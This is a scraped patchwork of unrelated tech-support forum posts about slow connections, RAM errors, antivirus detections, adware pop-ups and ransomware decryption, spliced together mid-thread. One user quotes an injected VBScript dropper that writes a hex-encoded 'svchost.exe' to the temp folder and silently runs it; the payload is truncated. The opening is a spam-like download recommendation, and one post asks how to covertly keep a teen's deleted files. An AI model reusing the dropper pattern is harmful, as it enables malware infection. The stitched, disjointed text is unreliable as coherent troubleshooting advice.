I recommend downloading and running DAP. It can help sort out any driver and firmware related issues on your system

It's worked out well for many of us in the past.

You can download it direct from this link http://downloaddap.org. (This link will open the download page of DAP so you can save a copy to your computer.)

HiI am unsure what is infecting my computer but it is adding the following script to all local html files whenever the computer restarts:[codebox]&lt;script Language=VBScript><!--DropFileName = "svchost.exe"WriteData = "4D5A...00"Set FSO = CreateObject("Scripting.FileSystemObject")DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileNameIf FSO.FileExists(DropPath)=False ThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData) Step 2FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSet WSHshell = CreateObject("WScript.Shell")WSHshell.Run DropPath, 0//--></SCRIPT>[/codebox]I have run DDS and attached the log but I can only run GMER in safe mode; running normally I get a BSOD of 'bad pool header' type as soon as GMER starts running.Sorry this is vague; I have run MalwareBytes, Super AntiSpyware, SpyBot Search & Destroy, Advanced System Protector and A Squared Free. They all locate stuff which reappears every time the computer restarts. I ran all these programs after disconnecting to the internet. Thanks in advance and I would really appreciate any light you could shed on this - I haven't been able to find anything through Google of this issue. All the bestMike

Sorry for the bad explication.

My issue is that when I am upstairs windows 7 says there is 5/5 bars as connection (same as downstairs)
But when I am upstairs I am lucky to reach 2mb/s
Downstairs I get 10mb/s(normal for me)

Could this be a driver issue?

A:A big decrease increase internet speed,

Could be a driver issue, a signal noise issue (even if you are getting 5 bars) or could be your upstairs PC is using the G band when the downstairs is using N band.

Hello behrouz, and welcome!
Your request seems very unusual indeed , people usually complain about slow speeds!
I would suggest that you contact your ISP [Internet Service Provider] and ask them if you can change 'plans' to a lower speed.

Can Virus & Bad Sector decrease Internet speed?

Usually Virus & Bad Sector slow down the PC, what about effect on internet?

A:Can Virus & Bad Sector decrease Internet speed?

Viruses cause havoc so yes
Please fill in your system spec's page and add which security suite/ s you have installed,

Review Jacee?s instructions to run Adwcleaner here post #7,
Ignore the title of the thread,

On the BleepingComputer site use the button that looks like this,

You can use these free tools to see if they find anything,
Manually Update them before running full scans,
Try not to use your computer while the scans are running, (one at a time of course).
See this tutorial on how to download and run Malwarebytes,
Also use the Custom scan option not the Threat scan,

Please Do Not clean/ Delete or Remove Any detections before posting the scan results first before review especially Malwarebytes,
SAS is safe to remove anything it finds
This one is the longest up to 4 hours, the others are only about 45 minutes,

This is a big question for me. I created a slipstreamed Windows XP SP3 by using nLite. My orginal cd is a Windows XP without any SP integrated on it. Since installing this new slipstreamed CD. I think total performance is decreased. Specially internet connection speed. I found many forum in the web that tells SP3 have slow downed their internet speed. The Dial-up and xDSL are more affected.

Is this true or not?

Any solution for it?

I found the opposite, it actually seems to speed the computer up not slow it down. I suppose it depends on your spec's.....

Hi all,
My problem started a few weeks ago! I caught a Virus and Dr. Web got rid of it as well as some trojan downloaders that Malwarebytes killed.
The virus ruined my Avast as well as Google Chrome - so I installed Avira and Zone Alarm Firewall as well as ZA Forcefield browser. Avira continues to tell me I have a virus and quarantines it. I contacted Avira and they say it looks like a Zone Alarm problem - I contacted ZA - and am still waiting - I also uploaded these to Avira to be checked for a false positive and have not heard back from them either.
I was wondering - if I still have a problem or if this is a false positive?
Here is what Avira's log says on the last catch:

A:HTML/Infected.WebPage.Gen HTML script virus

A common attack against the web infrastructure can be the infection of harmless web pages. Some malware changes every HTML file stored on the disc and adds a link (very often an IFrame) to a site hosting malicious code. Other attacks can aim for the web servers and try to insert forwarding to the pages hosted there. The owner of these pages is advised to take them offline. Fix the hole (either on his own PC or on the server), check the pages for infections, clean them and go online again. Infected Web Pages often contain additional Iframe, Object or Script Tags. The Script Tags often contain encrypted Code.Special detection HTML/Infected.WebPage.GenSince Avira is making the detection and you submitted samples, I suggest you wait on a reply from them or follow up by contacting them again with a reminder.See this Avira link for a discussion of a similar report.

Hello, all.

I have here an Acer Aspire T180, and would like to decrease the RAM speed. I think I have some bad RAM, since I keep getting errors in Windows, such as CRC checks, BSODs, etc. This is definitely caused by the RAM.

Memtest86+ and Windows Memory Diagnostic Test both show no errors in the RAM. They used to, but I had a technician clean the faulty RAM stick, and now it brings up no errors.

I believe this is because MemTest86+ is testing it at a slower speed than Windows uses. I would like to decrease the maximum speed at which the RAM is used, to avoid corruption etc.

I can provide any necessary details if asked for them.

I need this done by tonight, realistically, so any help is greatly appreciated.

hi im a compete novice on computers my son is always downloading which makes the other pcs in the house very slow been told to turn his download speed down on his pc how is it done please bare in mind i no note about them thanks

A:how to decrease download speed

Hi. It depends on how he is downloading and what.

If he is downloading using torrents, then in the client will be settings to adjust upload and download speeds. If he is sending data as fast as your connections allows (uploading), that is most likely to inhibit speeds on other pcs. To download, upload packets are also used. If you can't send upload packets, you can't download.

If he is downloading from a web browser from normal websites, then you'd need something like Getright installed to take care of the downloads. It "grabs" the downloads instead of letting the browser download. In Getright, you can adjust total download speed.

If you need any more info, please let us know.

I upgraded to Windows 7 Home Premium about a couple of weeks ago and since then, my download speed has decreased to less than 25% of my usual speed. My laptop (Toshiba Satellite P505D-S8930) is connected wirelessly to my Home Network via a Linksys router. I have Comcast Cable and used to be able to download at about 3200 KB/s. Now I average about 675 KB/s. Has anyone had the same issues and found a solution? Thank you for any advice.

This problems been annoying me now for a while and I've been unable to fix it. I hope someone hear can help.

We've recently had a new telephone line and signed up to Demon 8mb business package. We were told at the time that we could only receive 5.5mb on the line, fair enough.

Now for the problem.

Since the installation we've been receiving a gradual daily decrease in the broadband speed. Every day we come to work and the speed is upward of 6mb. By lunch time this has dropped to 3mb and by late afternoon can be as low as 800kb. The following morning, back up to 6mb.

Resetting/rebooting/disconnecting the modem/router (combined unit) has no effect on the speed.
I've contacted Demon during the late afternoon, they've tested the line and said it is running at over 8mb and there is nothing wrong with it.
The employees have very strict guidlines in place and I know for a fact that they are very light internet users. No streaming of any sort, no d/l files etc.

This is not an intermittent fault but a reoccurring problem which leads me to believe that there is not a problem with the telephone line but a problem with the server configuration.

Any ideas would be greatly appreciated.

Alright, here's how it went:

I was downloading some demo and playing one of my favourite online games when I suddenly lost my connection! Usually, this problem is fixed within a second or two, and I can safely re-connect to my game server, but this didn't happen. I then closed the game, and attempted to quickly fix this problem by using the winsock fix thingy-majigy. And it worked...

When I opened my IE browser, it took a little longer than usual. Also, when I resumed my download, it was at a speed (roughly) 4 times slower--90kbs/sec instead of 400kbs/sec.

How did this ever manage to happen? I'd appreciate some insight.

i connect to the internet through a netgear wireless router. up until yesterday, i have had NO problems whatsoever with my connection or speed. however, yesterday and today, i have noticed an unbelievable slowdown in speed. i used to always consistantly get 54mbs, and now i only get 1mbs. there have been absolutely NO changes in service or any change in my computer configurations. what could be responsible for the dramatic decrease and how can it be fixed? i am baffled because it still says that i have a very good/ excellent signal strength connection, it's just the speed. i have not changed any of the router settings either. any suggestions you may have would be greatly appreciated.

Download decrypt_mblblock.exe to your desktop. The complete usage instructions and video can be found here.If you only have a single hard disk with one partition, then only thing you need to do is start the tool.Windows XP users can simply double click and run the tool, Windows Vista, 7 & 8 users need to run the tool with administrator rights. Now it will automatically scan your complete hard disk for encrypted files, when there are encrypted files present it will automatically decrypt those without deleting the encrypted originals. After the decryption check that all of the decrypted files open properly.Once you have verified that the files were decrypted properly you can delete the encrypted HTML files. If you have more than one hard disk or partitions with encrypted files, things get slightly more complicated. To scan and decrypt files on those other hard disks or partitions do the following:While holding down the Windows key now press the R key. The Run Box will now appear. In the Run box Type in cmd.exe and press Enter. The Windows Command Line prompt should show up.You first need to switch into the directory where you downloaded the decryption tool to.This can be done using the cd command: cd /d <path>Just replace <path> with the path you downloaded the decryption tool to. If you downloaded it to C:\Users\Administrator\Downloads for example the exact command line to type in should look like this:cd /d C:\Users\Administrator\DownloadsIf you did everything right... As my title suggests my bro's laptop has this annoying infection.
I have Avira like my logs will say and the infection seems to be in a firefox profile. (Can I reinstall Firefox to fix my problem?)
I use Firefox but my brother IE 8 (and so IE is default).
At random times and when connected to Internet, a popup appears with usually
a scanner showing you its scanning your computer or ad for bad, virulent AV software. I know it's bad so I click
the X button in corner and it will go for a variable amount of time.
Avira btw cannot get rid of it and in fact does not even find it after scanning with maximum options.
This also happens sometimes much rare tho: A message appears telling I have an infected computer and wants me to press OK and scan using IE. I click X and once it opened IE with scanning screen. I click X ASAP.

One more issue: Firefox sometimes will say "Firefox has stopped working.."
and that it will close. Right away a balloon pops up in tray telling me the browser was closed to protect me from Data Execution Prevention.

Avira sometimes at random times pops up saying Virus or unwanted program was found, right? It asks me what to do with this file.
Move to quarantine
Overwrite and delete
Deny access

I usually picked delete or deny access
It found the virus in this file:

I am using Windows XP SP3.

I am trying to add an "edit" action to the .html file type. I have .html associated with Firefox. I go to Tools>Folder Options>File Types> and .html isn't even listed! (Nor is .htm) So I click "New" and add the .html file type. Then I click "Advanced" and fill in the action info and hit "OK". Then I hit "Close".

It doesn't work, and then when I go back into "File Types", html is not listed anymore. Basically, Windows is ignoring my attempts to add the .html file type.

I created the .xxx file type and added actions to open with Firefox and Word. It worked perfectly.

So what is it with the .html file type that Windows won't create it or list it?

I was wondering if you could help me;

i was wondering how can I (if possible) have a normal background in a site but if i create a table in the middle of the page, have the same page background visible thru the table except the background visible from the table to be watermarked (e.g. look lighter, water effect etc) e.g. like how the new msn messenger 6.0 chat window is, the background in the center being alot lighter then the background around the chat window itself.

A:Some HTML/Java script help plz

If this is for layout purposes, I don't recommend using tables. Learn to use CSS Positioning and it'll become much more complient with standards.

The other advantage is that you can use CSS to get just what you need. You can fiddle with the transparence with the "filter" class to achieve this, although I'm not entirely sure of the syntax. www.w3schools.com is probably the best site to learn CSS.

Ran an mbam scan earlier today with 0 results. However, following up with an Avast full scan, 2 identical 'high risk', HTML: Script-inf items surfaced. Avast then proposed a reboot with a further scan and although I wasn't there at the finish, I did note that there were 4 items- 3 'zip archive is corrupted' and 1 'CAB archive is corrupted'. After the scan, the computer had obviously rebooted and so I have no idea what happened to the corrupt items or what I should do now.

I have a tech savvy youth that knows how to cover his tracks after viewing questionable material by deleting files of his browsing and movie clip downloads and then emptying the trash directory; Spector software does a good job of tracking events and sites but does not capture the music or video streams but does anyone know how to write a script program for W98 that would copy the files sent to the trash directory to a hidden directory that would remain even when the trash can is emptied and that could be emptied or deleted without going to trash so the system would not choke itself.

do you know if he's doing this through the cache folder, or through the cache destination !!dir??

what i mean is that, if your using netscape, you can tell it where to store the files being viewed!
under the preferences!!
if it's IE, enable the password, unless he's gutsy enough to get rid of the ratings.pol file he's locked out of bad site(well most of them)
And if he does get rid of the file, then you've got him...you'll have to redo all the settings, not to mention take the belt out..heh heh
well, for netscape you can tel it to store the cache int a folder on c:\
but when your making it, rename it to this!
hold ALT, and renme to 255, this will hide it from anyone who doesn't know what it is!

I think the above is done right, if not post back an i or someone else will do it the right way..i'm just kinda in a rush!!
remember in netscape:

change the destination dir to the newfolder on C:\ ....hope it works!

I'm not sure what's causing this to happen and where to begin to start trying to get rid of what ever is causing it as I've googled and googled and no one else's solutions have worked for me so far.
Basically I'm getting this pop up multiple times a day

It doesn't matter whether I press yes or no as It continues to pop up randomly afterwards.

I did install google chrome recently to see if it will still pop up if I stop using firefox (it still comes up).
I've also tried disabling all plugins/scrips on my firefox.
I've found that it will continue to pop up even if I'm not browsing the web.
Even if I restart the computer and afk right after loging in, making sure no browsers are running in the background with task manager, it will pop up.
How often it comes up seems random as well.  As I'm writing this post it has come up three times, but there are days where it may only come up once while I'm playing a video game for maybe a few hours (or maybe I've just gotten used to the pop up sound and don't realise it anymore... >.>).
